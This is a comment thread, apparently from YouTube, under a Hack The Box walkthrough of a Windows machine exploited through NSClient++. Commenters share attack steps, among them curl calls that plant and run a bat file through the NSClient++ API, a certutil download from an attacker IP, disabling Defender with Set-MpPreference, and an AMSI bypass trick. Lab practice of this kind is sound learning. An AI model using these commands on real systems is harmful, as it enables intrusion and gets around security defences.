Long time listener first time caller. Great video Ippsec. Really enjoyed learning from your process and how you trouble shoot your way through. Thanks for sharing!
Nicely done as usual. What I did was a little bit different. Instead of dealing with thepainintheass web gui, I hit the API from command line. We can even upload the script from the API :)
Hi IPPSEC, just a quick correction in your video. When you was trying to get ntuser.data the file should have been ntuser.dat which is the user registry hive. Once again a good video
The method to get system on this box was intended to be done through the api. Upload nc to the box first and then create a bat file with the command to execute nc, then--- curl -s -k -u admin -X PUT localhost:8443/api/v1/scripts/ext/scripts/file.bat --data-binary @file.bat curl -k -i -u admin localhost:8443/api/v1/queries/file/commands/execute All done without needing the nsclient password.
I highly doubt that was the intended route. If so, the box would have been rated Medium by HTB Staff due to the documentation around that API being so bad.
Hey. Its my box. I'm dmw0ng. There were multiple methods, but the intended was to use the api. I thought it would be easy knowing restarting the nscp service would kill it for everyone. I thought it would be a lesson to all not to just find an exploit and blindly follow.
@@danielmorris5302 Ah sorry - Had checked the author provided writeup after solving the box and there was no mention of api. Perhaps was an old version.
@@ippsec I submitted the doc with the method similar to what you described. However, after discussions with staff, it seemed it was not feasible, I then provided additional docs to highlight the preferred method. This box was a carbon copy of what I discovered somewhere during a pentest, I was the only person on the box, and therefore did not have the issues that you get when multiple people are on it. Thats why I submitted original documentation as I did. A shame, because it was as real life as I could get it because of the find. Unfortunately, a badly rated box, but, HTB always produce incredible boxes, so this one will soon be forgot. 🤭. Good job with your patience.
@@danielmorris5302 apart from the lil problems in the end man.. This is a very unique and great box.. I learnt a lot. Respect for sharing this box and knowledge with us all..
36:32 "why make it so complicated?" if Ippsec says its complicated then u know u went too far with it.lol btw windows defender is getting stronger everyday...most of the old tricks are all getting blocked recently,almost made me cry once
Nice! Got the user, but was baffled on where to begin privesc on windows, good to see where I messed up. Did not try another browser, so I did not look into that part anymore, and of course hit a brick wall.
Can someone explain to me, why OWASP says (about directory traversal) that: "In Windows an attacker can navigate only in a partition that locates web root..." and here we can navigate in the whole disk?
Did it happen to anybody that the password to log into NSCLIENT++ web interface just didn't work? I tried on Firefox and Chrome after tunneling and I keep getting "403 Your not allowed" even though the password is the same IppSec used which is really frustrating.
Every video is one step towards giving up for me. As a learner I have to stop and take a step back. However, I do think that there is a point to ask for suggestions. So, here is my question: How to learn? With HTB, it is hard to pop a box even now. Has the learning process changed or something? I'm clueless...
It's not about being the best, it's about learning. There is so much to learn about computer sciences and hacking. If you get tired of HTB, search other interesting subjects like reversing or cryptography, they may interest you more because they look new. Also, try other pages. HTB gets boring sometimes. I recomend you cryptohack.org . Don't put too much pressure on you, do it for the thrill of learning what surrounds you.
@@TheHectorshark I understand. Thank you very much for the response! Will leave that here in case somebody has the same issue. You hit me with cryptography bcz I'm a crypto guy. Reversing? Not so much of my bread, but trying harder will work here for me. For popping boxes, well, leaving it for a while seems okay for now. Again, thank you!
With every box you go over you have more knowledge. More knowledge = more chance to do stuff individually. Before running learn to walk kind of thing. I started this in March from literally zero (0) Linux, Networking knowledge with the goal to get my OSCP. On every retired box I go over I take extensive notes and make sure I understand the point of why something is done. It's a very effective studying technique which I can suggest you to follow. Don't be discouraged and expect too much of yourself from the start. Just keep on grinding and it will come in time just as everything in life does.
Just adding this answer for anyone who's just starting like me , HTB is hard for a beginner i would suggest trying tryhackme.com as it walks you through everything and explains it , nonetheless ippsec is a great source for information and i recommend you watch every week's machine and try to do it like him or in a different way through reading the write-ups in HTB forums , Retired boxes are active for free users for 2 weeks after retiring
Hi. I have 2 questions: 1) why after getting shell he did not use winPeas or some tool for privescalation?I mean it would not be it easy to gather information? 2) 59:31 here after getting trouble with New-object, could not he to try download that powershell file with curl or wget? why did he used nc? Thanks in advance.
Because it has less chance to fail. New lines, quotes, spaces, etc can cause things to fail when passing commands through the command line. Encoding saves you from that headache
@@robinhood3841 the different encoding is due to the different environment he is interfacing. He's passing data from a Linux system (which uses UTF8) to a Windows environment (Which uses UTF16)
Hey Guys, Does anyone knows where IppSec found is terminal color scheme ? Maybe it is a theme ? I really like it but can't find it ... I am using Gogh atm but there is no color scheme like this :(
I gave up on Administrator flag. Defender cleans up the files too quick even if you know the commands. And I am using the VIP+ subscription so it is my own instance. Learned what I needed to know and moving on. Screw the flag lol
@@ippsec thanks! i've been learning a lot from you though it's really hard for me to be qualified in hackthebox. you're one of my inspirations. more power to the channel!
There's a way around that. Use the powershell Set-MpPreference command to disable active real time monitoring by the AV. This only works if you can execute commands as nt authority, which you can by using the nsclient++ vulnerability
I do the windows registry query to pull system version. reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName and I tend to lean more on the windows cmd for a revers shell if PowerShell fails certutil.exe -urlcache -split -f 10.10.14.2/file.exe file.exe Thank you for all you do ippsec.
Hello ippsec i hope you read this, You are extremely talented dude why don’t you make a udemy course like a 40 hour course and sell it for 50 dollars something thats good with you, i hope you do it and i will be the first one to buy because your above average in your techniques and everything man. Much respect and i wish you a good day :)
IppSec runs parrot in a vm. As for best option, it comes a lot down to preference. Using distros like Kali or Parrot are nice and easy to start as you've got basically any tool you want pre-installed, but you can use any distro you like as long as it has packages for the tools you want
@@xXThePr0Xx The question is how it knew it was malicious even with the IEX removed. It must have been one heck of an over protective anti-virus to assume that powershell doing a WebClient call was malicious o_O
Long time listener first time caller. Great video Ippsec. Really enjoyed learning from your process and how you trouble shoot your way through. Thanks for sharing!
That SSH command to start up the port forward without having to escape your SSH is so freakin cool.
I did know how to do it, would you tell me ?
Nicely done as usual. What I did was a little bit different. Instead of dealing with thepainintheass web gui, I hit the API from command line. We can even upload the script from the API :)
Hi IPPSEC, just a quick correction in your video. When you was trying to get ntuser.data the file should have been ntuser.dat which is the user registry hive. Once again a good video
Ah yea. Funny the mistakes made when doing things live and manually :-).. There's definitely some value in scripting out tools to do this stuff.
The method to get system on this box was intended to be done through the api.
Upload nc to the box first and then create a bat file with the command to execute nc, then---
curl -s -k -u admin -X PUT localhost:8443/api/v1/scripts/ext/scripts/file.bat --data-binary @file.bat
curl -k -i -u admin localhost:8443/api/v1/queries/file/commands/execute
All done without needing the nsclient password.
I highly doubt that was the intended route. If so, the box would have been rated Medium by HTB Staff due to the documentation around that API being so bad.
Hey. Its my box. I'm dmw0ng. There were multiple methods, but the intended was to use the api. I thought it would be easy knowing restarting the nscp service would kill it for everyone. I thought it would be a lesson to all not to just find an exploit and blindly follow.
@@danielmorris5302 Ah sorry - Had checked the author provided writeup after solving the box and there was no mention of api. Perhaps was an old version.
@@ippsec I submitted the doc with the method similar to what you described. However, after discussions with staff, it seemed it was not feasible, I then provided additional docs to highlight the preferred method. This box was a carbon copy of what I discovered somewhere during a pentest, I was the only person on the box, and therefore did not have the issues that you get when multiple people are on it. Thats why I submitted original documentation as I did. A shame, because it was as real life as I could get it because of the find. Unfortunately, a badly rated box, but, HTB always produce incredible boxes, so this one will soon be forgot. 🤭. Good job with your patience.
@@danielmorris5302 apart from the lil problems in the end man.. This is a very unique and great box.. I learnt a lot. Respect for sharing this box and knowledge with us all..
36:32 "why make it so complicated?"
if Ippsec says its complicated then u know u went too far with it.lol
btw windows defender is getting stronger everyday...most of the old tricks are all getting blocked recently,almost made me cry once
U r not alone with it.
The privesc was so damn annoying because everyone was accidentally crashing the box :D
Nice! Got the user, but was baffled on where to begin privesc on windows, good to see where I messed up. Did not try another browser, so I did not look into that part anymore, and of course hit a brick wall.
Thanks for the video. I learn a lot from you.
That specific error from defender is AMSI (Anti-malware scan interface) blocking your powershell execution.
Can someone explain to me, why OWASP says (about directory traversal) that: "In Windows an attacker can navigate only in a partition that locates web root..." and here we can navigate in the whole disk?
Did it happen to anybody that the password to log into NSCLIENT++ web interface just didn't work? I tried on Firefox and Chrome after tunneling and I keep getting "403 Your not allowed" even though the password is the same IppSec used which is really frustrating.
35:41 That Laugh made my day
For real! Lol I'm not sure I've ever hear him laugh before
Great work! Thank you !
Hi Ippsec, I wonder why port forward is needed for the credentials to get accepted? could you please enlighten me?
Couldn't figure out how to root this box.. Thanks for the great insight in your methodology!
Every video is one step towards giving up for me.
As a learner I have to stop and take a step back.
However, I do think that there is a point to ask for suggestions.
So, here is my question:
How to learn?
With HTB, it is hard to pop a box even now.
Has the learning process changed or something?
I'm clueless...
It's not about being the best, it's about learning. There is so much to learn about computer sciences and hacking. If you get tired of HTB, search other interesting subjects like reversing or cryptography, they may interest you more because they look new. Also, try other pages. HTB gets boring sometimes. I recomend you cryptohack.org . Don't put too much pressure on you, do it for the thrill of learning what surrounds you.
@@TheHectorshark I understand. Thank you very much for the response! Will leave that here in case somebody has the same issue. You hit me with cryptography bcz I'm a crypto guy. Reversing? Not so much of my bread, but trying harder will work here for me. For popping boxes, well, leaving it for a while seems okay for now. Again, thank you!
With every box you go over you have more knowledge. More knowledge = more chance to do stuff individually. Before running learn to walk kind of thing.
I started this in March from literally zero (0) Linux, Networking knowledge with the goal to get my OSCP. On every retired box I go over I take extensive notes and make sure I understand the point of why something is done. It's a very effective studying technique which I can suggest you to follow.
Don't be discouraged and expect too much of yourself from the start. Just keep on grinding and it will come in time just as everything in life does.
Just adding this answer for anyone who's just starting like me , HTB is hard for a beginner i would suggest trying tryhackme.com as it walks you through everything and explains it , nonetheless ippsec is a great source for information and i recommend you watch every week's machine and try to do it like him or in a different way through reading the write-ups in HTB forums , Retired boxes are active for free users for 2 weeks after retiring
Hi. I have 2 questions: 1) why after getting shell he did not use winPeas or some tool for privescalation?I mean it would not be it easy to gather information? 2) 59:31 here after getting trouble with New-object, could not he to try download that powershell file with curl or wget? why did he used nc? Thanks in advance.
having someone to rely on whenever u have a problem in these type of things is realy helpfull, too bad i don t have one T-T
Crashing the box is great :D
Can you explain why you encoded the payload before you send it to powershell ?
Because it has less chance to fail. New lines, quotes, spaces, etc can cause things to fail when passing commands through the command line. Encoding saves you from that headache
@@ippsec thanks but i mean the little endian encode
iconv -t utf-16le before base64 encoding
@@robinhood3841 the different encoding is due to the different environment he is interfacing. He's passing data from a Linux system (which uses UTF8) to a Windows environment (Which uses UTF16)
thnak u for ur videooooss very helpful
Hey Guys, Does anyone knows where IppSec found is terminal color scheme ? Maybe it is a theme ? I really like it but can't find it ... I am using Gogh atm but there is no color scheme like this :(
@ippsec you got command prompt, get-service is ps cmdlet
So what was the reasoning for the switch to Parrot?
ruclips.net/video/8KJebvmd1Fk/видео.html
Why using powershell encoded commands? can't it be worked without encoding?
This box is broken
I gave up on Administrator flag. Defender cleans up the files too quick even if you know the commands. And I am using the VIP+ subscription so it is my own instance. Learned what I needed to know and moving on. Screw the flag lol
Is that the pwnbox or is it you're local setup ??
how come ../../User/Nathan is 404 but when you put /Desktop/passwords.txt you got 200?? could you please enlighten me?
Its just because however the webserver is accessing the file errors out on a directory; and the webserver puts 404 whenever there's an error
Because it was vulnerable to LFI, only files can be viewed not dirs !
@@ippsec thanks! i've been learning a lot from you though it's really hard for me to be qualified in hackthebox. you're one of my inspirations. more power to the channel!
@@dbeeeeee thanks! i should learn LFI
What is Ippsec in IRL name
How do I develop my skills just like you ? Please reply
Ah you just need to buy my very expensive book and comes with a free certificate.
Just practice more what.
Replay old hackthebox.
Try harder
How come this box retire so fast
It was strange that you were able to access nsclient in the beginning without port forwarding...
not really, the vpn of hackthebox is made for that
I think he was trying to access over Firefox which gives random errors and can make it seem closed
@@ippsec Actually when I did this box it was a total mess. Port 8443 was only open internally.
@@buestrm2841 I had 8443 open, but couldn't access it with a browser, and a raw GET / command through nc on 8443 failed as well.
You should give FFUF a try instead of gobuster. Best of gobuster and WFUZZ combined.
Mmmmmm, better than sex! I would love to see all your tools. Inspiration to dive deeper for root, no matter where the box resides.
PSA: nc.exe is flagged by AV on this box now. Most walkthroughs don't work anymore. Updated defender I guess.
Well, execute payload is not always the solution. Maybe we can look at creating a new user with admin permission, disable the defender with command.
There's a way around that. Use the powershell Set-MpPreference command to disable active real time monitoring by the AV. This only works if you can execute commands as nt authority, which you can by using the nsclient++ vulnerability
and then u can run any exe without any issues. That's how I rooted the box
nc64.exe worked with me
@@Xx-nd1rs how this works, I don't understand
Should we have a license for Burp??
no it has a free version
I do the windows registry query to pull system version.
reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName
and I tend to lean more on the windows cmd for a revers shell if PowerShell fails
certutil.exe -urlcache -split -f 10.10.14.2/file.exe file.exe
Thank you for all you do ippsec.
Hello ippsec i hope you read this,
You are extremely talented dude why don’t you make a udemy course like a 40 hour course and sell it for 50 dollars something thats good with you, i hope you do it and i will be the first one to buy because your above average in your techniques and everything man.
Much respect and i wish you a good day :)
you are pro i am also trying to become pro like you by your videos 😂😂😂😂😂😂😂😂😂😂😂😂
Sep11th, 2021. nc.exe no longer working with windows defender anymore. try XC by xct.
Are you use parrot os as your primary os or u use it on vmware
Which is the best option for pentest please tell me
IppSec runs parrot in a vm. As for best option, it comes a lot down to preference. Using distros like Kali or Parrot are nice and easy to start as you've got basically any tool you want pre-installed, but you can use any distro you like as long as it has packages for the tools you want
Because of this mess I missed my chance of getting my first root on live machines.
try traceback, it was the first root on any active machine i got
This was good priv escalation but is daam annoying!
For IEX try; $env:comspec[4,15,25] --join ''
please make videos for getting started for beginners 🙂
58:36 How did it identify the script as malicious before even requesting it from the web server? 😂
it's not about the script but the IEX command that tries to make a connection to a remote server
@@xXThePr0Xx The question is how it knew it was malicious even with the IEX removed. It must have been one heck of an over protective anti-virus to assume that powershell doing a WebClient call was malicious o_O
That was an easy ? lol
I wanted to punch whoever made that cancer of a UI tbh. So unnecessarily unintuitive lmao